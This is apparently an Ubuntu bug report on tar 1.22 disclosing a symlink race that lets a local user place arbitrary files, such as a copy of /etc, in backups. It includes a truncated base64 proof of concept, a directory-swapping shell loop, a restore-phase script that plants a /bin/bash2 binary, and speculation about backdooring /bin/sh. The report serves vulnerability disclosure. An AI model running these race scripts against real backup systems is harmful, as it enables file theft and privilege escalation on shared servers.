Tar allows inclusion of arbitrary files in backup
Affects | Status | Importance | Assigned to | Milestone | |
---|---|---|---|---|---|
tar (Ubuntu) |
Fix Released
|
Low
|
Unassigned |
Bug Description
Binary package hint: tar
Tar does not check modifications of path during backup (symlinks). A local might use that to create arbitrary large backups or include arbitrary files at any locations, he as write access to, e.g. include a copy of real /etc at /home/[
Tested on:
Description: Ubuntu 10.04 LTS
Release: 10.04
# apt-cache policy tar
tar:
Installed: 1.22-2
Candidate: 1.22-2
Version table:
*** 1.22-2 0
500 http://
100 /var/lib/
Base64 tar.bz2 of POC:
QlpoOTFBWSZTWSm
1MyJtCeQjEHqBgA
SJJpqMo8hTZNMmU
o+WX5g24/
RxxLBWPugjxv8Nu
Y7JyNmHjZhCiJJf
n6++AkdEELo76Yp
dMRUq8vAgDIljwC
xZ/oTzigHWTGHCs
JzFucGT8wUcjUwp
TDT5NKg6iqICcPf
+Kd3t9yU7+
IS5Dzo+
ZskGighYQH2U0hK
o6ZypQSHKzCTRVh
The attack can also be used without inotify, but chances per modified directory vary. Still, this allows remote attacks on backup, e.g. from a shared computer room machine, if e.g. home is mounted via NFS. The files included will then be from the server where the backup tasks run, most likely the storage server providing all NFS resources. The same should be possible via sftp access or malicious servlets. I haven't checked the chances for remote attacks, permanent local flips between show about 10-20% chance to win with following algorithm:
mkdir root
dd if=/dev/zero bs=1M count=50 "of=root/ "
mkdir root/etc
while true; do
sleep 1
mv root rootx
ln -s / root
sleep 1
rm root
mv rootx root
done
Since a malicious user might use e.g. 30 directories in parallel, it will give him 1-(0.9^30) chance to win (more than 95%). The size of the zero-byte file is important, it interferes with the tar delay (resulting from disk speed, compression speed). There might be optimization strategies with different file sizes, that give higher chances with lower number of files (leave that to the mathematicians).
Some thoughts on that topic:
http://
Things todo:
* I haven't checked if it is possible to interfere with the proc interface in that way, e.g. to gain access to kernel memory or other information, although I guess, that I should be possible with more subtle time-races, that allow to change the permissions of the file in backup to arbitrary values also.
* I haven't checked, if the same issue is present during restore. If yes (as I suspect), and restore is run with root privileges, arbitrary code execution will follow, .e.g. by replacing any system files (e.g. use backdoored /bin/sh) or modification of /proc interface.
Changed in tar (Ubuntu): | |
status: | Invalid → New |
Checked restore, following script will add a /bin/bash2 binary.
#!/bin/sh
mkdir -p root/adir
dd if=/dev/zero bs=1M count=100 of=root/adir/afile
mkdir root/bin
cp -a /bin/bash root/bin/bash2
echo "Wait for backup run, press any key ..." >&2
read xxxvar
echo "Waiting for event .." >&2
./DirModifyInotify "root/" "root" "/"